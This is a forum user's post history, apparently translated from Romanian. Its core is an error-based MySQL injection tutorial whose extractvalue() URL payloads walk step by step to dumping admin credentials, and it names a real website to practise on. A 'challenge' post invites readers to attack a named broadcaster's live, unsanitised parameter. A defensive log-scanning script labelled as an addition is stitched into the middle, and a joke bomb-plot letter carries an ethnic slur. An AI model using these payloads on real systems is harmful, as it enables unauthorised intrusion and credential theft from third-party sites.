Everything posted by denjacker
-
Bianca has the presumption of innocence until definitively proven otherwise, even if the accusations come from 2 sides. Replace "ate the chocolate" with "committed murder" .... who do you put in jail and why? Tudor and Alex could be accomplices..
-
Introduction.

In this tutorial I will be teaching you SQL injection using the XML function extractvalue() to extract data from MySQL versions 5.1 and above. This tutorial assumes that you have an understanding of the structure of MySQL and the basic functions and operators needed for SQL injection, so I won't be covering them.

Advantages of this injection type
- No need for union.
- Can find version(), user(), database() without using select.
- Good error based injection to use when getting the error "The used select statements have a different number of columns" with union.
- Clearer than the generic Double Query.

Disadvantages
- extractvalue() isn't supported on MySQL versions below 5.1

The tutorial.

Grabbing the target's MySQL server data

So you have found a website and have confirmed that an SQL injection exists by adding a single quote after the parameter and receiving a MySQL error. Now we can extract the version, user, database etc. by using this injection:

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--

Result: 'Xpath syntax error: 5.5.9:user@localhost'

So we have received the version() and user() by error message, so we know it's vulnerable, and we will move on to gaining the admin's login details.

Finding the database tables

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--

Result: 'Xpath syntax error: <address'

So now we have the first table in the database, 'address', by using LIMIT to skip all the information_schema tables. Now we need to go through the tables using 'limit' until we find a table named admin, user, tbl_admin, users or similar.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 160,1)))--

Result: 'Xpath syntax error: :users'

So we have found a table named 'users', which will most likely hold the columns which contain the usernames and passwords. Now we move on to finding the column names.

Protip: Start at limit 75,1 to skip the database schema tables.

Finding the database columns

So now that we have selected the table we want, we need to find the columns containing the login data. Look for username, password, user, pass or similar.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--

Result: 'Xpath syntax error: :username'

So on the 1051st column we found the column named 'username'. Now we need to look for the column containing the password.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--

Result: 'Xpath syntax error: :password'

So on the 1151st column in the database we found the column named 'password'. Now we move on to the final step.

Protip: Start at limit 970,1 to skip all the database schema columns.

Extracting data - the final step

All we do now is join the columns together from the users table like so.

www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--

Result: 'Xpath syntax error: :Admin:password1'

Voilà! You now have the admin login details in username:password format.

You can find a good example of when to use this injection here: http://www.sientries.co.uk/event.php?event_id=460

Hope you like this tutorial, please take time to leave your feedback.

Credits: --Error 403 - forbidden-- @ HF
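Seen from the defending side, the requests in this walkthrough leave a recognisable shape in web server access logs. The following is an added example, not part of the original post, that flags them; the log lines, paths and IP addresses are constructed, and updatexml() is an assumption that goes beyond the tutorial.

```python
import re
from urllib.parse import unquote_plus

# Signatures built from the payload shapes quoted in the tutorial above.
# updatexml() is not on the page: a sibling MySQL XML function (generalisation).
SIGNATURES = {
    "xpath_error_func": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "hex_concat": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I),
    "limit_walk": re.compile(r"\blimit\s+\d+\s*,\s*1\b", re.I),
}
# Common log format: ip ident user [time] "request line" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" (?P<status>\d{3})')

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /error.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /error.php?id=null%20and%20'
    'extractvalue(rand(),concat(0x3a,version(),0x3a,user()))-- HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /error.php?id=null+and+'
    'extractvalue(rand(),concat(0x3a,(select+concat(0x3c,table_name)+from+'
    'information_schema.tables+limit+85,1)))-- HTTP/1.1" 200 799',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=extractvalue+mysql+docs HTTP/1.1" 200 2048',
]

def decode_query(request):
    """Return the URL-decoded query string of a logged request line."""
    target = request.split(" ", 1)[1] if " " in request else ""
    target = re.sub(r"\s+HTTP/\d(?:\.\d)?$", "", target)
    return unquote_plus(target.partition("?")[2])

def scan(lines):
    """Return (line_no, client_ip, matched_signatures) for suspect requests."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m["request"])
        hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
        # Alert only on the XPath function call; the other signatures show
        # which stage of the walkthrough the request corresponds to.
        if "xpath_error_func" in hits:
            findings.append((line_no, m["ip"], hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The search request on the last sample line contains the word extractvalue but no function call, so it is not flagged.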
-
-
Letter from an Arab terrorist in Romania

We salute with respect, Boss. Landed in Romania with bomb hidden in suitcase, passed airport control without problem. Kept cursed American dollar to build bomb here, gave half to taxi, other half a gypsy stole from pocket. Met brother Ahmed, shop owner, he helped me. Discussed bomb plan with him at café, ate fresh eclair, got salmonella poisoning, we ended up at hospital, Romanian doctor did not care at all, our asses were on fire. Boss, bomb with anthrax powder could not be made in Romania, someone stole the anthrax, so tried plan with bomb that goes boom-boom…! Moved into brother Ahmed's apartment, reminded me very nicely of my country: no water at the tap, windows broken like in Beirut, roof tiles falling on head when wind blows. Watched PROTV programme about explosion of nitrate truck, it scared me. These Romanians have nerve, no joke! Must be recruited urgently, boss! Bomb with nitrate would have had big effect… Was interested in piloting plane to hit Romanian building. Saw on television, MIG aircraft crashed by itself in peasant's field, plus Romanian peasant wrecked his building by himself, fell asleep drunk, cigarette lit, mother-in-law died, they threw big party… Dear Boss, someone stole from me the gas kept to put in bomb, and last night, when I went out to buy baklava, gas cylinder exploded on ground floor. Here in Romania, many idiots! Screamed, shaken to the core, shat myself from fear! Boss, I am coming home! These Romanians do not need terrorism, they do the job themselves.
-
MySQL Injection EXTRA-Difficult challenge
denjacker replied to denjacker's topic in Challenges (CTF)
Congratulations to tromfil, his answer has been validated!! I'm still waiting for others ::bump:: Later Edit: ----------------------- I see that people aren't really getting involved.. It would be good to know whether anyone besides tromfil has tried.. Do you want a tutorial, or shall we wait for you to keep trying? At least let me know if there are people interested in the subject.
-
Congratulations! Long life to you, maestro, and many more to come. We're waiting for the cup at the World Championship!
-
The following parameter is given: http://www.radiobremen.de/apps/php/mediathek/metadaten.php?id=040903 .. obviously completely unsanitized! There is no need to complicate things with bypass techniques, because there is absolutely no filter blocking functions, operators or other characters. It all comes down to manipulating the query that already exists in metadaten.php in such a way that executing the injection does not conflict with it. I said "EXTRA-Difficult" in the title because there are 2-3 things that are chained together and that you absolutely have to take into account, but as a technique it is not necessarily very, very difficult. The problem is to find out, first of all, what those things are.

The requirements are:
- inject the parameter strictly using UNION SELECT .. BLIND or ERROR BASED also work, but I'm not interested in that kind of syntax.
- post a screenshot [preferably with the injection censored] in which you have extracted some basic information proving that you succeeded: version, db name, system user, OS, ...etc .. whatever you want, it doesn't matter much what exactly.
- or send a PM with the syntax for validation. They will not be made public!

My screenshot

The winners will be shown in the list below:

And the WINNERS aaaaaaareeee:
----------------------------------------------
[1] :::: tromfil
[2] :::: tdxev
[3] :::: jesus
[4] :::: birouamar
[5] :::: to be edited..
-----------------------------------------------
So ..
-
10x vlad .. the solution really is the classic one. Only the site loads a bit slower.. but it works.
-
Gabriel87, you're welcome.. Dan, yes! Nytro.. please close the topic!
-
no .. problems with the host, nameservers and other inexplicable stuff. Puscas is missing, we feel his absence, we miss him, I'd piss on his hairdo!
-
RWRpdGF0aSA6CkM6XFdpbmRvd3NcU3lzdGVtMzJcZHJpdmVyc1xldGNcaG9zdHMKYWRhdWdhdGkg IG8gbGluaWUgbm91YToKCjg5LjM3LjU5LjI1IHd3dy5pbnNlY3VyaXR5LnJvIGluc2VjdXJpdHku cm8KClJlZnJlc2gh
-
Hybrid - Disappear Here Hybrid - Can You Hear Me Hybrid - Formula of Fear Hyper - We Control The Crystal Method - Acetone
-
For those outside the trolling, watch the animations in the promos on MTV.
-
It's nothing new that opinions are divided. But if someone comes with an idea and wants to develop the subject with someone interested in the theme, why the hell does at least 1 person have to jump in and go off on tangents about how he is right (as if he had enough clear, fundamental evidence) and how the idea the discussion started from is totally wrong! You don't agree with the topic, move on! Like A Bowss! Let the topic flow.
-
YouTube - Illuminati - The Music Industry Exposed [Full Length] hit play from minute 43:00
-
_______________________________
-
"Phishing" with google.com - creating realistic fake webpages.
denjacker replied to a topic in Tutoriale in engleza